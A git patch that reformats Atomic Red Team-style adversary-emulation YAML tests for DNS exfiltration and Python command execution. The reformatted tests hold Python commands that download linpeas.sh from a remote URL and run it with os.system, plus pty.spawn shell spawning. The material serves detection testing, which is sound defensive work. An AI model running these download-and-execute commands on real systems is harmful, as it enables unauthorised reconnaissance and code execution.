From c690a13984c339786f6cc80dcee3e0b294ffa3b9 Mon Sep 17 00:00:00 2001 From: Josh Rickard Date: Tue, 14 Feb 2023 12:32:38 -0600 Subject: [PATCH] fix: Updating format of 2 yaml defintions for new schema (#2330) * fix: Updating format of 2 yaml defintions for new schema * fix: Updating T1048 --------- Co-authored-by: MSAdministrator --- atomics/T1048/T1048.yaml | 2 +- atomics/T1059.006/T1059.006.yaml | 338 +++++++++++++++---------------- 2 files changed, 170 insertions(+), 170 deletions(-) diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index a282a43a..b4daf5ff 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -77,7 +77,7 @@ atomic_tests: time: description: The time in milliseconds to wait between each DNS request type: string - default: 500 + default: "500" encoding: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: string diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml index 5a087865..ac2fbfbb 100644 --- a/atomics/T1059.006/T1059.006.yaml +++ b/atomics/T1059.006/T1059.006.yaml @@ -1,172 +1,172 @@ attack_technique: T1059.006 display_name: 'Command and Scripting Interpreter: Python' -atomic_tests: -- name: Execute shell script via python's command mode arguement - auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb - description: Download and execute shell script and write to file then execute locally using Python -c (command mode) - supported_platforms: - - linux - input_arguments: - script_url: - description: Shell script public URL - type: string - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Name of shell script downloaded from the script_url - type: string - default: T1059.006-payload +atomic_tests: + - name: Execute shell script via python's command mode arguement + auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb + description: Download and execute shell script and write to file then execute locally using Python -c (command mode) + supported_platforms: + - linux + input_arguments: + script_url: + description: Shell script public URL + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Name of shell script downloaded from the script_url + type: string + default: T1059.006-payload + executor: + description: Linux shell + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + dependency_executor_name: sh + dependencies: + - description: Verify if python is in the environment variable path and attempt to import requests library. + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' + name: sh + cleanup_command: | + rm #{payload_file_name} + - name: 'Execute Python via scripts (Linux)' + auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 + description: Create Python file (.py) that downloads and executes shell script via executor arguments + supported_platforms: + - linux + input_arguments: + python_script_name: + description: Python script name + type: path + default: T1059.006.py + script_url: + description: Shell script public URL + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Shell script file name downloaded from the script_url + type: string + default: T1059.006-payload + executor: + description: Payload or script interpreter / executor + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + dependency_executor_name: sh + dependencies: + - description: | + Requires Python + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + echo 'import requests' > #{python_script_name} + echo 'import os' >> #{python_script_name} + echo 'url = "#{script_url}"' >> #{python_script_name} + echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} + echo 'session = requests.session()' >> #{python_script_name} + echo 'source = session.get(url).content' >> #{python_script_name} + echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} + echo 'fd.write(source)' >> #{python_script_name} + echo 'fd.close()' >> #{python_script_name} + echo 'os.system(malicious_command)' >> #{python_script_name} + $which_python #{python_script_name} + name: sh + cleanup_command: | + rm #{python_script_name} #{payload_file_name} + - name: 'Execute Python via Python executables (Linux)' + auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa + description: | + Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments + supported_platforms: + - linux + input_arguments: + python_script_name: + description: Name of Python script name + type: path + default: T1059.006.py + script_url: + description: URL hosting external malicious payload + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Shell script file name downloaded from the script_url + type: string + default: T1059.006-payload + executor: + description: Payload or script interpreter / executor + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + python_binary_name: + description: Name of Python file to be compiled + type: path + default: T1059.006.pyc + dependency_executor_name: sh + dependencies: + - description: | + Requires Python + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + echo 'import requests' > #{python_script_name} + echo 'import os' >> #{python_script_name} + echo 'url = "#{script_url}"' >> #{python_script_name} + echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} + echo 'session = requests.session()' >> #{python_script_name} + echo 'source = session.get(url).content' >> #{python_script_name} + echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} + echo 'fd.write(source)' >> #{python_script_name} + echo 'fd.close()' >> #{python_script_name} + echo 'os.system(malicious_command)' >> #{python_script_name} + $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")' + $which_python #{python_binary_name} + name: sh + cleanup_command: | + rm #{python_binary_name} #{python_script_name} #{payload_file_name} + - name: 'Python pty module and spawn function used to spawn sh or bash' + auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792 + description: | + Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence + supported_platforms: + - linux + dependencies: + - description: | + Verify if python is in the environment variable path and attempt to import requests library. + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests executor: - description: Linux shell - type: string - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. - type: string - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - dependency_executor_name: sh - dependencies: - - description: Verify if python is in the environment variable path and attempt to import requests library. - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' - name: sh - cleanup_command: | - rm #{payload_file_name} -- name: 'Execute Python via scripts (Linux)' - auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 - description: Create Python file (.py) that downloads and executes shell script via executor arguments - supported_platforms: - - linux - input_arguments: - python_script_name: - description: Python script name - type: path - default: T1059.006.py - script_url: - description: Shell script public URL - type: string - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Shell script file name downloaded from the script_url - type: string - default: T1059.006-payload - executor: - description: Payload or script interpreter / executor - type: string - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files - type: string - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - dependency_executor_name: sh - dependencies: - - description: | - Requires Python - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - echo 'import requests' > #{python_script_name} - echo 'import os' >> #{python_script_name} - echo 'url = "#{script_url}"' >> #{python_script_name} - echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} - echo 'session = requests.session()' >> #{python_script_name} - echo 'source = session.get(url).content' >> #{python_script_name} - echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} - echo 'fd.write(source)' >> #{python_script_name} - echo 'fd.close()' >> #{python_script_name} - echo 'os.system(malicious_command)' >> #{python_script_name} - $which_python #{python_script_name} - name: sh - cleanup_command: | - rm #{python_script_name} #{payload_file_name} -- name: 'Execute Python via Python executables (Linux)' - auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa - description: | - Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments - supported_platforms: - - linux - input_arguments: - python_script_name: - description: Name of Python script name - type: path - default: T1059.006.py - script_url: - description: URL hosting external malicious payload - type: string - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Shell script file name downloaded from the script_url - type: string - default: T1059.006-payload - executor: - description: Payload or script interpreter / executor - type: string - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files - type: string - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - python_binary_name: - description: Name of Python file to be compiled - type: path - default: T1059.006.pyc - dependency_executor_name: sh - dependencies: - - description: | - Requires Python - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - echo 'import requests' > #{python_script_name} - echo 'import os' >> #{python_script_name} - echo 'url = "#{script_url}"' >> #{python_script_name} - echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} - echo 'session = requests.session()' >> #{python_script_name} - echo 'source = session.get(url).content' >> #{python_script_name} - echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} - echo 'fd.write(source)' >> #{python_script_name} - echo 'fd.close()' >> #{python_script_name} - echo 'os.system(malicious_command)' >> #{python_script_name} - $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")' - $which_python #{python_binary_name} - name: sh - cleanup_command: | - rm #{python_binary_name} #{python_script_name} #{payload_file_name} -- name: 'Python pty module and spawn function used to spawn sh or bash' - auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792 - description: | - Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence - supported_platforms: - - linux - dependencies: - - description: | - Verify if python is in the environment variable path and attempt to import requests library. - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests - executor: - command: |- - which_python=$(which python || which python3 || which python2) - $which_python -c "import pty;pty.spawn('/bin/sh')" - exit - $which_python -c "import pty;pty.spawn('/bin/bash')" - exit - name: bash + command: |- + which_python=$(which python || which python3 || which python2) + $which_python -c "import pty;pty.spawn('/bin/sh')" + exit + $which_python -c "import pty;pty.spawn('/bin/bash')" + exit + name: bash